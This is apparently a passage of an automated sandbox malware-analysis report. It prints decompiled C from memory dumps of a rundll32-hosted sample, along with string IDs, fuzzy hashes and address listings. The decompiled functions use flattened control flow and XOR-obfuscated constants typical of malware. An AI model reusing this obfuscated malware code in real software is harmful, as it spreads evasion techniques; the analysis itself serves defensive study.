                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: /kJ$!}$"O$2$l$vZ$v${T$Ma$i
                                                                      • API String ID: 0-820926959
                                                                      • Opcode ID: 32a2f9d8b3478e3ec80044164199ffb2d6203919a6996b17acfb5b8c23225709
                                                                      • Instruction ID: 89ffa27737dde4956a0a2f10d7c80f41133719b5d7ee473454011f1151af1635
                                                                      • Opcode Fuzzy Hash: 32a2f9d8b3478e3ec80044164199ffb2d6203919a6996b17acfb5b8c23225709
                                                                      • Instruction Fuzzy Hash: 110246725083809FE364CF25C889A5BFBE1BBC4358F048A1DF6E9962A0D7B5C945DF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 96%
                                                                      			E01FF9106(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int* _a16) {
                                                                      				char _v68;
                                                                      				signed int _v72;
                                                                      				signed int _v76;
                                                                      				signed int _v80;
                                                                      				signed int _v84;
                                                                      				signed int _v88;
                                                                      				signed int _v92;
                                                                      				signed int _v96;
                                                                      				signed int _v100;
                                                                      				signed int _v104;
                                                                      				signed int _v108;
                                                                      				signed int _v112;
                                                                      				signed int _v116;
                                                                      				signed int _v120;
                                                                      				signed int _v124;
                                                                      				signed int _v128;
                                                                      				signed int _v132;
                                                                      				signed int _v136;
                                                                      				signed int _v140;
                                                                      				signed int _v144;
                                                                      				signed int _v148;
                                                                      				signed int _v152;
                                                                      				signed int _v156;
                                                                      				signed int _v160;
                                                                      				signed int _v164;
                                                                      				signed int _v168;
                                                                      				signed int _v172;
                                                                      				void* __ecx;
                                                                      				void* _t286;
                                                                      				signed int _t335;
                                                                      				signed int _t342;
                                                                      				signed int _t343;
                                                                      				signed int _t344;
                                                                      				signed int _t345;
                                                                      				signed int _t346;
                                                                      				signed int _t347;
                                                                      				signed int _t348;
                                                                      				signed int _t349;
                                                                      				signed int _t350;
                                                                      				signed int _t351;
                                                                      				void* _t354;
                                                                      				signed int* _t397;
                                                                      				signed int* _t401;
                                                                      				void* _t404;
                                                                      
                                                                      				_t398 = _a12;
                                                                      				_t397 = _a16;
                                                                      				_push(_t397);
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				E02002550(_t286);
                                                                      				_v72 = 0x2367;
                                                                      				_t401 =  &(( &_v172)[6]);
                                                                      				_v72 = _v72 | 0x097ad610;
                                                                      				_v72 = _v72 ^ 0x097ae8e2;
                                                                      				_t354 = 0x1dc5535c;
                                                                      				_v92 = 0x56dc;
                                                                      				_v92 = _v92 + 0xce73;
                                                                      				_v92 = _v92 ^ 0x000174de;
                                                                      				_v108 = 0x5b94;
                                                                      				_v108 = _v108 ^ 0x203ddd03;
                                                                      				_v108 = _v108 << 0xa;
                                                                      				_v108 = _v108 ^ 0xf61a093d;
                                                                      				_v140 = 0x3ec5;
                                                                      				_t342 = 0x2d;
                                                                      				_v140 = _v140 / _t342;
                                                                      				_v140 = _v140 + 0xffff0d7c;
                                                                      				_t343 = 0x54;
                                                                      				_v140 = _v140 * 0x56;
                                                                      				_v140 = _v140 ^ 0xffae99ec;
                                                                      				_v100 = 0x56eb;
                                                                      				_v100 = _v100 + 0xbf92;
                                                                      				_v100 = _v100 + 0xffffb004;
                                                                      				_v100 = _v100 ^ 0x0000e62d;
                                                                      				_v124 = 0xb6af;
                                                                      				_v124 = _v124 >> 0xc;
                                                                      				_v124 = _v124 / _t343;
                                                                      				_v124 = _v124 ^ 0x0000233e;
                                                                      				_v120 = 0xde2;
                                                                      				_t54 =  &_v120; // 0xde2
                                                                      				_t344 = 0x4c;
                                                                      				_v120 =  *_t54 / _t344;
                                                                      				_v120 = _v120 * 0x3f;
                                                                      				_v120 = _v120 ^ 0x00006eff;
                                                                      				_v104 = 0xa720;
                                                                      				_v104 = _v104 * 0x69;
                                                                      				_v104 = _v104 + 0x1686;
                                                                      				_v104 = _v104 ^ 0x0044923c;
                                                                      				_v112 = 0xb3bf;
                                                                      				_v112 = _v112 >> 1;
                                                                      				_v112 = _v112 >> 0xc;
                                                                      				_v112 = _v112 ^ 0x00005d19;
                                                                      				_v96 = 0x2a95;
                                                                      				_v96 = _v96 >> 6;
                                                                      				_v96 = _v96 + 0xbf11;
                                                                      				_v96 = _v96 ^ 0x0000bd99;
                                                                      				_v148 = 0xc1fd;
                                                                      				_v148 = _v148 << 0xc;
                                                                      				_v148 = _v148 * 0x31;
                                                                      				_v148 = _v148 << 5;
                                                                      				_v148 = _v148 ^ 0x42da2451;
                                                                      				_v160 = 0xd54a;
                                                                      				_t345 = 0x17;
                                                                      				_v160 = _v160 / _t345;
                                                                      				_v160 = _v160 | 0x2f8e477c;
                                                                      				_v160 = _v160 + 0xffff9d16;
                                                                      				_v160 = _v160 ^ 0x2f8dc8af;
                                                                      				_v168 = 0x5d03;
                                                                      				_v168 = _v168 + 0xffffafa9;
                                                                      				_v168 = _v168 + 0xffff8780;
                                                                      				_v168 = _v168 | 0x25100a61;
                                                                      				_v168 = _v168 ^ 0xfffffc23;
                                                                      				_v116 = 0x4d25;
                                                                      				_t346 = 0x4a;
                                                                      				_v116 = _v116 / _t346;
                                                                      				_t347 = 0x45;
                                                                      				_v116 = _v116 / _t347;
                                                                      				_v116 = _v116 ^ 0x00001bc5;
                                                                      				_v152 = 0xf56f;
                                                                      				_v152 = _v152 >> 0xc;
                                                                      				_v152 = _v152 + 0xffff6840;
                                                                      				_v152 = _v152 | 0xadc68f8a;
                                                                      				_v152 = _v152 ^ 0xffffbd08;
                                                                      				_v172 = 0xb7ce;
                                                                      				_v172 = _v172 >> 9;
                                                                      				_v172 = _v172 >> 4;
                                                                      				_v172 = _v172 << 0xd;
                                                                      				_v172 = _v172 ^ 0x0000b2e5;
                                                                      				_v80 = 0x57d2;
                                                                      				_v80 = _v80 ^ 0xaa637a5b;
                                                                      				_v80 = _v80 ^ 0xaa6340a6;
                                                                      				_v156 = 0xb744;
                                                                      				_v156 = _v156 + 0x63ef;
                                                                      				_t348 = 0x7c;
                                                                      				_v156 = _v156 / _t348;
                                                                      				_v156 = _v156 ^ 0xd73448d2;
                                                                      				_v156 = _v156 ^ 0xd7344e9f;
                                                                      				_v132 = 0x174e;
                                                                      				_t349 = 0x78;
                                                                      				_v132 = _v132 * 0x65;
                                                                      				_v132 = _v132 | 0x3b954933;
                                                                      				_v132 = _v132 ^ 0xbecd0e21;
                                                                      				_v132 = _v132 ^ 0x85504ce6;
                                                                      				_v164 = 0x7af9;
                                                                      				_v164 = _v164 << 9;
                                                                      				_v164 = _v164 >> 7;
                                                                      				_v164 = _v164 * 0x41;
                                                                      				_v164 = _v164 ^ 0x007cf7ff;
                                                                      				_v136 = 0x7571;
                                                                      				_v136 = _v136 + 0xffff8152;
                                                                      				_v136 = _v136 | 0x8539ecc8;
                                                                      				_v136 = _v136 / _t349;
                                                                      				_v136 = _v136 ^ 0x022226c3;
                                                                      				_v88 = 0xe259;
                                                                      				_v88 = _v88 * 0x74;
                                                                      				_v88 = _v88 ^ 0x0066854f;
                                                                      				_v144 = 0x1b27;
                                                                      				_v144 = _v144 >> 0xd;
                                                                      				_v144 = _v144 * 0x66;
                                                                      				_v144 = _v144 >> 0xb;
                                                                      				_v144 = _v144 ^ 0x00005892;
                                                                      				_v76 = 0x4fda;
                                                                      				_v76 = _v76 ^ 0xefbec303;
                                                                      				_v76 = _v76 ^ 0xefbe9eae;
                                                                      				_v84 = 0x12ec;
                                                                      				_v84 = _v84 << 8;
                                                                      				_v84 = _v84 ^ 0x0012dc80;
                                                                      				_v128 = 0x576c;
                                                                      				_t350 = 0x3e;
                                                                      				_v128 = _v128 / _t350;
                                                                      				_t351 = 0x79;
                                                                      				_v128 = _v128 / _t351;
                                                                      				_v128 = _v128 + 0x759e;
                                                                      				_v128 = _v128 ^ 0x000075a0;
                                                                      				goto L1;
                                                                      				do {
                                                                      					while(1) {
                                                                      						L1:
                                                                      						_t404 = _t354 - 0x1cceac70;
                                                                      						if(_t404 > 0) {
                                                                      							break;
                                                                      						}
                                                                      						if(_t404 == 0) {
                                                                      							E01FFF834( *((intOrPtr*)(_t398 + 0xc)), _v160,  &_v68, _v168);
                                                                      							_t401 =  &(_t401[2]);
                                                                      							_t354 = 0x326fdce7;
                                                                      							continue;
                                                                      						} else {
                                                                      							if(_t354 == 0x828a2c) {
                                                                      								E01FFF834( *((intOrPtr*)(_t398 + 0x14)), _v172,  &_v68, _v80);
                                                                      								_t401 =  &(_t401[2]);
                                                                      								_t354 = 0x10364e2a;
                                                                      								continue;
                                                                      							} else {
                                                                      								if(_t354 == 0xc083f5a) {
                                                                      									E01FFFEE3(_t397,  &_v68, _v108, _v140, _v100, _v124);
                                                                      									_t401 =  &(_t401[4]);
                                                                      									_t354 = 0x223ac297;
                                                                      									continue;
                                                                      								} else {
                                                                      									if(_t354 == 0x10364e2a) {
                                                                      										E01FFBAD2(_v156, _v132, __eflags, _t398 + 0x18,  &_v68, _v164);
                                                                      										_t401 =  &(_t401[3]);
                                                                      										_t354 = 0x1e572357;
                                                                      										continue;
                                                                      									} else {
                                                                      										if(_t354 == 0x17d7bd79) {
                                                                      											E01FFF834( *((intOrPtr*)(_t398 + 8)), _v96,  &_v68, _v148);
                                                                      											_t401 =  &(_t401[2]);
                                                                      											_t354 = 0x1cceac70;
                                                                      											continue;
                                                                      										} else {
                                                                      											if(_t354 == 0x18be4013) {
                                                                      												_push(_t354);
                                                                      												_t335 = E01FF54FB(_t397[1]);
                                                                      												 *_t397 = _t335;
                                                                      												__eflags = _t335;
                                                                      												if(__eflags != 0) {
                                                                      													_t354 = 0xc083f5a;
                                                                      													continue;
                                                                      												}
                                                                      											} else {
                                                                      												if(_t354 != 0x19774c23) {
                                                                      													goto L28;
                                                                      												} else {
                                                                      													E01FFF834( *((intOrPtr*)(_t398 + 0x28)), _v76,  &_v68, _v84);
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L10:
                                                                      						return 0 |  *_t397 != 0x00000000;
                                                                      					}
                                                                      					__eflags = _t354 - 0x1dc5535c;
                                                                      					if(_t354 == 0x1dc5535c) {
                                                                      						_t354 = 0x210e94e8;
                                                                      						 *_t397 =  *_t397 & 0x00000000;
                                                                      						__eflags =  *_t397;
                                                                      						_t397[1] = _v128;
                                                                      						goto L28;
                                                                      					} else {
                                                                      						__eflags = _t354 - 0x1e572357;
                                                                      						if(__eflags == 0) {
                                                                      							E01FFBAD2(_v136, _v88, __eflags, _t398 + 0x20,  &_v68, _v144);
                                                                      							_t401 =  &(_t401[3]);
                                                                      							_t354 = 0x19774c23;
                                                                      							goto L1;
                                                                      						} else {
                                                                      							__eflags = _t354 - 0x210e94e8;
                                                                      							if(_t354 == 0x210e94e8) {
                                                                      								_t397[1] = E0200DBC4(_t398);
                                                                      								_t354 = 0x18be4013;
                                                                      								goto L1;
                                                                      							} else {
                                                                      								__eflags = _t354 - 0x223ac297;
                                                                      								if(__eflags == 0) {
                                                                      									E01FFBAD2(_v120, _v104, __eflags, _t398,  &_v68, _v112);
                                                                      									_t401 =  &(_t401[3]);
                                                                      									_t354 = 0x17d7bd79;
                                                                      									goto L1;
                                                                      								} else {
                                                                      									__eflags = _t354 - 0x326fdce7;
                                                                      									if(_t354 != 0x326fdce7) {
                                                                      										goto L28;
                                                                      									} else {
                                                                      										E01FFF834( *((intOrPtr*)(_t398 + 0x10)), _v116,  &_v68, _v152);
                                                                      										_t401 =  &(_t401[2]);
                                                                      										_t354 = 0x828a2c;
                                                                      										goto L1;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					goto L10;
                                                                      					L28:
                                                                      					__eflags = _t354 - 0x3b76f47b;
                                                                      				} while (__eflags != 0);
                                                                      				goto L10;
                                                                      			}

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %M$-$>#$Y$g#$lW$qu$>#$c$z
                                                                      • API String ID: 0-2374964813
                                                                      • Opcode ID: de3c8303d3afa683ad230a9c6f16e67f513d3a93420d356ad213b772e6f8532c
                                                                      • Instruction ID: 18646743a33fdaf7d5ec676ff6a0714b5269f0a58eb6d9ad296d40a919723d48
                                                                      • Opcode Fuzzy Hash: de3c8303d3afa683ad230a9c6f16e67f513d3a93420d356ad213b772e6f8532c
                                                                      • Instruction Fuzzy Hash: 3BE122B2909741DFE364CF65C88991FBBE1BFD4708F108A1DF295862A0D7B69909CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 96%
                                                                      			E01FF4D90() {
                                                                      				char _v524;
                                                                      				unsigned int _v532;
                                                                      				intOrPtr _v536;
                                                                      				intOrPtr _v540;
                                                                      				intOrPtr _v544;
                                                                      				intOrPtr _v548;
                                                                      				intOrPtr _v552;
                                                                      				intOrPtr _v556;
                                                                      				intOrPtr _v560;
                                                                      				char _v564;
                                                                      				intOrPtr _v568;
                                                                      				char _v572;
                                                                      				signed int _v576;
                                                                      				signed int _v580;
                                                                      				signed int _v584;
                                                                      				unsigned int _v588;
                                                                      				signed int _v592;
                                                                      				signed int _v596;
                                                                      				signed int _v600;
                                                                      				signed int _v604;
                                                                      				signed int _v608;
                                                                      				signed int _v612;
                                                                      				signed int _v616;
                                                                      				signed int _v620;
                                                                      				signed int _v624;
                                                                      				signed int _v628;
                                                                      				signed int _v632;
                                                                      				signed int _v636;
                                                                      				signed int _v640;
                                                                      				signed int _v644;
                                                                      				signed int _v648;
                                                                      				signed int _v652;
                                                                      				signed int _v656;
                                                                      				signed int _v660;
                                                                      				signed int _v664;
                                                                      				signed int _v668;
                                                                      				signed int _v672;
                                                                      				signed int _v676;
                                                                      				signed int _v680;
                                                                      				signed int _v684;
                                                                      				signed int _v688;
                                                                      				signed int _v692;
                                                                      				signed int _v696;
                                                                      				signed int _v700;
                                                                      				signed int _t364;
                                                                      				intOrPtr _t367;
                                                                      				void* _t372;
                                                                      				char _t382;
                                                                      				void* _t412;
                                                                      				signed int _t413;
                                                                      				signed int _t414;
                                                                      				signed int _t415;
                                                                      				signed int _t416;
                                                                      				signed int _t417;
                                                                      				signed int _t418;
                                                                      				signed int _t419;
                                                                      				signed int _t420;
                                                                      				signed int _t421;
                                                                      				signed int _t422;
                                                                      				signed int* _t425;
                                                                      
                                                                      				_t425 =  &_v700;
                                                                      				_v664 = 0x9fa1;
                                                                      				_v664 = _v664 >> 0xf;
                                                                      				_t372 = 0x3b39200;
                                                                      				_v664 = _v664 + 0x495e;
                                                                      				_v664 = _v664 * 0x17;
                                                                      				_t412 = 0;
                                                                      				_v664 = _v664 ^ 0x00069788;
                                                                      				_v604 = 0xceb5;
                                                                      				_v604 = _v604 >> 0xd;
                                                                      				_v604 = _v604 ^ 0x00000106;
                                                                      				_v624 = 0xb514;
                                                                      				_v624 = _v624 + 0xffffa476;
                                                                      				_t413 = 0x15;
                                                                      				_v624 = _v624 * 0x46;
                                                                      				_v624 = _v624 ^ 0x00187a00;
                                                                      				_v668 = 0x7309;
                                                                      				_v668 = _v668 * 0x23;
                                                                      				_v668 = _v668 >> 3;
                                                                      				_v668 = _v668 ^ 0x5792a418;
                                                                      				_v668 = _v668 ^ 0x57934680;
                                                                      				_v676 = 0x9940;
                                                                      				_v676 = _v676 + 0xffff3182;
                                                                      				_v676 = _v676 / _t413;
                                                                      				_t414 = 0x57;
                                                                      				_v676 = _v676 / _t414;
                                                                      				_v676 = _v676 ^ 0x0023e38f;
                                                                      				_v700 = 0xa5bb;
                                                                      				_v700 = _v700 | 0x2eb34f51;
                                                                      				_t415 = 0x69;
                                                                      				_v700 = _v700 / _t415;
                                                                      				_v700 = _v700 + 0xffff1835;
                                                                      				_v700 = _v700 ^ 0x00708bbe;
                                                                      				_v640 = 0x8462;
                                                                      				_t416 = 0x31;
                                                                      				_v640 = _v640 / _t416;
                                                                      				_v640 = _v640 | 0xf5b8cac2;
                                                                      				_v640 = _v640 ^ 0xf5b8b775;
                                                                      				_v644 = 0x4c0;
                                                                      				_v644 = _v644 + 0xfffff031;
                                                                      				_v644 = _v644 << 0xf;
                                                                      				_v644 = _v644 ^ 0xfa78cc6a;
                                                                      				_v576 = 0x47f3;
                                                                      				_v576 = _v576 | 0x1c217342;
                                                                      				_v576 = _v576 ^ 0x1c214363;
                                                                      				_v600 = 0x6198;
                                                                      				_v600 = _v600 << 5;
                                                                      				_v600 = _v600 ^ 0x000c7289;
                                                                      				_v632 = 0xa609;
                                                                      				_v632 = _v632 + 0xaff1;
                                                                      				_v632 = _v632 + 0xffff061b;
                                                                      				_v632 = _v632 ^ 0x0000381f;
                                                                      				_v584 = 0x236b;
                                                                      				_v584 = _v584 | 0x1d93d101;
                                                                      				_v584 = _v584 ^ 0x1d9382a6;
                                                                      				_v580 = 0xb44f;
                                                                      				_v580 = _v580 ^ 0x84ec8f50;
                                                                      				_v580 = _v580 ^ 0x84ec3805;
                                                                      				_v592 = 0x2849;
                                                                      				_v592 = _v592 >> 8;
                                                                      				_v592 = _v592 ^ 0x00006208;
                                                                      				_v684 = 0xffa5;
                                                                      				_v684 = _v684 >> 4;
                                                                      				_t417 = 0xb;
                                                                      				_v684 = _v684 * 0x1c;
                                                                      				_v684 = _v684 << 0xc;
                                                                      				_v684 = _v684 ^ 0x1bf5e695;
                                                                      				_v692 = 0x7e89;
                                                                      				_v692 = _v692 + 0x2efa;
                                                                      				_v692 = _v692 / _t417;
                                                                      				_v692 = _v692 + 0x2a18;
                                                                      				_v692 = _v692 ^ 0x000064a1;
                                                                      				_v596 = 0xa252;
                                                                      				_t418 = 0x59;
                                                                      				_v596 = _v596 * 9;
                                                                      				_v596 = _v596 ^ 0x0005d303;
                                                                      				_v680 = 0xbeb4;
                                                                      				_v680 = _v680 >> 2;
                                                                      				_v680 = _v680 + 0x1673;
                                                                      				_v680 = _v680 + 0x7062;
                                                                      				_v680 = _v680 ^ 0x0000a375;
                                                                      				_v648 = 0x506f;
                                                                      				_v648 = _v648 >> 0xd;
                                                                      				_v648 = _v648 / _t418;
                                                                      				_v648 = _v648 ^ 0x00002d61;
                                                                      				_v656 = 0xa4c4;
                                                                      				_t419 = 0x3f;
                                                                      				_v656 = _v656 / _t419;
                                                                      				_v656 = _v656 ^ 0xb08d55bb;
                                                                      				_v656 = _v656 + 0x38bc;
                                                                      				_v656 = _v656 ^ 0xb08d947f;
                                                                      				_v688 = 0x4e3f;
                                                                      				_v688 = _v688 >> 8;
                                                                      				_v688 = _v688 >> 4;
                                                                      				_t420 = 0x52;
                                                                      				_v688 = _v688 / _t420;
                                                                      				_v688 = _v688 ^ 0x00004d88;
                                                                      				_v672 = 0x8701;
                                                                      				_v672 = _v672 >> 9;
                                                                      				_t421 = 0x24;
                                                                      				_v672 = _v672 * 7;
                                                                      				_v672 = _v672 >> 0xe;
                                                                      				_v672 = _v672 ^ 0x000031cf;
                                                                      				_v636 = 0x4a3c;
                                                                      				_v636 = _v636 >> 0xa;
                                                                      				_v636 = _v636 / _t421;
                                                                      				_v636 = _v636 ^ 0x00005769;
                                                                      				_v612 = 0x66c7;
                                                                      				_v612 = _v612 << 0xc;
                                                                      				_v612 = _v612 ^ 0x7aee3ef9;
                                                                      				_v612 = _v612 ^ 0x7c821959;
                                                                      				_v628 = 0x44bc;
                                                                      				_v628 = _v628 << 0xb;
                                                                      				_v628 = _v628 << 4;
                                                                      				_v628 = _v628 ^ 0x225e6a59;
                                                                      				_v696 = 0xf2f9;
                                                                      				_t422 = 0x36;
                                                                      				_v696 = _v696 / _t422;
                                                                      				_v696 = _v696 << 4;
                                                                      				_v696 = _v696 << 7;
                                                                      				_v696 = _v696 ^ 0x0023cdd9;
                                                                      				_v652 = 0xfa07;
                                                                      				_v652 = _v652 ^ 0xfb6d8595;
                                                                      				_v652 = _v652 | 0xb1ef9277;
                                                                      				_v652 = _v652 * 0x2f;
                                                                      				_v652 = _v652 ^ 0x410fad88;
                                                                      				_v608 = 0x638e;
                                                                      				_v608 = _v608 * 0x64;
                                                                      				_v608 = _v608 ^ 0x0026a181;
                                                                      				_v660 = 0xd0ef;
                                                                      				_v660 = _v660 << 0xc;
                                                                      				_v660 = _v660 + 0xdc19;
                                                                      				_v660 = _v660 << 0xc;
                                                                      				_v660 = _v660 ^ 0xfcc19d1e;
                                                                      				_t371 = _v608;
                                                                      				_v616 = 0x9e76;
                                                                      				_v616 = _v616 + 0xffffc7b8;
                                                                      				_v616 = _v616 + 0xb6c0;
                                                                      				_v616 = _v616 ^ 0x000153b0;
                                                                      				_v588 = 0xaa15;
                                                                      				_v588 = _v588 >> 0x10;
                                                                      				_v620 = 0x4821;
                                                                      				_v620 = _v620 >> 0xb;
                                                                      				_v620 = _v620 ^ 0xbb1b7ef2;
                                                                      				_v620 = _v620 ^ 0xbb1b7ef8;
                                                                      				do {
                                                                      					while(_t372 != 0x3b39200) {
                                                                      						if(_t372 == 0x724dd21) {
                                                                      							E02004291(_v624, _v668,  &_v572, _v676);
                                                                      							_t372 = 0x23ca7f5b;
                                                                      							continue;
                                                                      						} else {
                                                                      							if(_t372 == 0x1549ba03) {
                                                                      								_push(0x1ff12d8);
                                                                      								_push(_v576);
                                                                      								_push(_v644);
                                                                      								E01FFA4D7(__eflags, _v632, _v584, _v580, _v592, E01FF5DFC(_v700, _v640, __eflags),  *0x2011088 + 0x254,  &_v524,  *0x2011088 + 0x38);
                                                                      								E02000D6D(_v684, _v692, _v596, _t356);
                                                                      								_t425 =  &(_t425[0xd]);
                                                                      								_t372 = 0x2c137c18;
                                                                      								continue;
                                                                      							} else {
                                                                      								if(_t372 == 0x23ca7f5b) {
                                                                      									_v572 = _v572 - E01FF47EB();
                                                                      									_t372 = 0x1549ba03;
                                                                      									asm("sbb [esp+0x94], edx");
                                                                      									continue;
                                                                      								} else {
                                                                      									if(_t372 == 0x2c137c18) {
                                                                      										_push(_t372);
                                                                      										_t364 = E0200C0C8(_v664, _v604, _v680,  &_v524, _v648, _v656, 0, _v688, _t372, _v620, _v672);
                                                                      										_t371 = _t364;
                                                                      										_t425 =  &(_t425[0xa]);
                                                                      										__eflags = _t364 - 0xffffffff;
                                                                      										if(__eflags != 0) {
                                                                      											_t372 = 0x32dad644;
                                                                      											continue;
                                                                      										}
                                                                      									} else {
                                                                      										if(_t372 == 0x2cffd5ae) {
                                                                      											E01FFF1ED(_v652, _v608, _v660, _v616, _t371);
                                                                      										} else {
                                                                      											if(_t372 != 0x32dad644) {
                                                                      												goto L15;
                                                                      											} else {
                                                                      												_t382 = _v572;
                                                                      												_t367 = _v568;
                                                                      												_push(_t382);
                                                                      												_v560 = _t367;
                                                                      												_v552 = _t367;
                                                                      												_v544 = _t367;
                                                                      												_v536 = _t367;
                                                                      												_v532 = _v588;
                                                                      												_v564 = _t382;
                                                                      												_v556 = _t382;
                                                                      												_v548 = _t382;
                                                                      												_v540 = _t382;
                                                                      												E020041CA(_t371, _v636, _v612, _v628,  &_v564, _t382, _v696);
                                                                      												_t425 =  &(_t425[6]);
                                                                      												_t412 =  !=  ? 1 : _t412;
                                                                      												_t372 = 0x2cffd5ae;
                                                                      												continue;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L18:
                                                                      						return _t412;
                                                                      					}
                                                                      					_t372 = 0x724dd21;
                                                                      					L15:
                                                                      					__eflags = _t372 - 0x140d4499;
                                                                      				} while (__eflags != 0);
                                                                      				goto L18;
                                                                      			}

                                                                      0x01ff5058
                                                                      0x01ff5060
                                                                      0x01ff5068
                                                                      0x01ff506d
                                                                      0x01ff5076
                                                                      0x01ff507b
                                                                      0x01ff5081
                                                                      0x01ff5089
                                                                      0x01ff5091
                                                                      0x01ff509b
                                                                      0x01ff509c
                                                                      0x01ff50a0
                                                                      0x01ff50a5
                                                                      0x01ff50ad
                                                                      0x01ff50b5
                                                                      0x01ff50c0
                                                                      0x01ff50c4
                                                                      0x01ff50cc
                                                                      0x01ff50d4
                                                                      0x01ff50d9
                                                                      0x01ff50e1
                                                                      0x01ff50e9
                                                                      0x01ff50f1
                                                                      0x01ff50f6
                                                                      0x01ff50fb
                                                                      0x01ff5103
                                                                      0x01ff5118
                                                                      0x01ff511b
                                                                      0x01ff511f
                                                                      0x01ff5124
                                                                      0x01ff5129
                                                                      0x01ff5131
                                                                      0x01ff5139
                                                                      0x01ff5141
                                                                      0x01ff514e
                                                                      0x01ff5152
                                                                      0x01ff515a
                                                                      0x01ff5167
                                                                      0x01ff516b
                                                                      0x01ff5173
                                                                      0x01ff517b
                                                                      0x01ff5180
                                                                      0x01ff5188
                                                                      0x01ff518d
                                                                      0x01ff5195
                                                                      0x01ff5199
                                                                      0x01ff51a1
                                                                      0x01ff51a9
                                                                      0x01ff51b1
                                                                      0x01ff51b9
                                                                      0x01ff51c4
                                                                      0x01ff51da
                                                                      0x01ff51e2
                                                                      0x01ff51e7
                                                                      0x01ff51ef
                                                                      0x01ff51f7
                                                                      0x01ff51f7
                                                                      0x01ff5205
                                                                      0x01ff53d1
                                                                      0x01ff53d8
                                                                      0x00000000
                                                                      0x01ff520b
                                                                      0x01ff5211
                                                                      0x01ff533a
                                                                      0x01ff533f
                                                                      0x01ff5346
                                                                      0x01ff5396
                                                                      0x01ff53ab
                                                                      0x01ff53b0
                                                                      0x01ff53b3
                                                                      0x00000000
                                                                      0x01ff5217
                                                                      0x01ff521d
                                                                      0x01ff5322
                                                                      0x01ff5329
                                                                      0x01ff532e
                                                                      0x00000000
                                                                      0x01ff5223
                                                                      0x01ff5229
                                                                      0x01ff52d1
                                                                      0x01ff5300
                                                                      0x01ff5305
                                                                      0x01ff5307
                                                                      0x01ff530a
                                                                      0x01ff530d
                                                                      0x01ff5313
                                                                      0x00000000
                                                                      0x01ff5313
                                                                      0x01ff522f
                                                                      0x01ff5235
                                                                      0x01ff5403
                                                                      0x01ff523b
                                                                      0x01ff5241
                                                                      0x00000000
                                                                      0x01ff5247
                                                                      0x01ff5247
                                                                      0x01ff524e
                                                                      0x01ff5255
                                                                      0x01ff5256
                                                                      0x01ff525d
                                                                      0x01ff5264
                                                                      0x01ff526b
                                                                      0x01ff527d
                                                                      0x01ff5291
                                                                      0x01ff52a0
                                                                      0x01ff52a7
                                                                      0x01ff52ae
                                                                      0x01ff52b7
                                                                      0x01ff52be
                                                                      0x01ff52c4
                                                                      0x01ff52c7
                                                                      0x00000000
                                                                      0x01ff52c7
                                                                      0x01ff5241
                                                                      0x01ff5235
                                                                      0x01ff5229
                                                                      0x01ff521d
                                                                      0x01ff5211
                                                                      0x01ff540b
                                                                      0x01ff5417
                                                                      0x01ff5417
                                                                      0x01ff53e2
                                                                      0x01ff53e4
                                                                      0x01ff53e4
                                                                      0x01ff53e4
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: s$!H$?N$I($Yj^"$^I$a-$bp$iW$k#
                                                                      • API String ID: 0-2383980949
                                                                      • Opcode ID: 3a7b7d2aee1d2da099ab02c0b435a3e1fdf31419516e32818dd925bfee935484
                                                                      • Instruction ID: 8ddae67e05001bd472bb24a1e0bc6b36963aba3e80d0bb046846a1466a0f1e61
                                                                      • Opcode Fuzzy Hash: 3a7b7d2aee1d2da099ab02c0b435a3e1fdf31419516e32818dd925bfee935484
                                                                      • Instruction Fuzzy Hash: D9F11271508380DFE368CF25D589A5BBBE1BFC4758F108A1DF29A962A0C7B58949CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: s$!H$?N$I($Yj^"$^I$a-$bp$iW$k#
                                                                      • API String ID: 0-2383980949
                                                                      • Opcode ID: 53375b368af7517bad7c4fad8f15d908feaf64c991a717236934422a6675b11b
                                                                      • Instruction ID: a39994f54c49b5df98277221f69536f0cb668e74ee46e5dad5ae219ec601db00
                                                                      • Opcode Fuzzy Hash: 53375b368af7517bad7c4fad8f15d908feaf64c991a717236934422a6675b11b
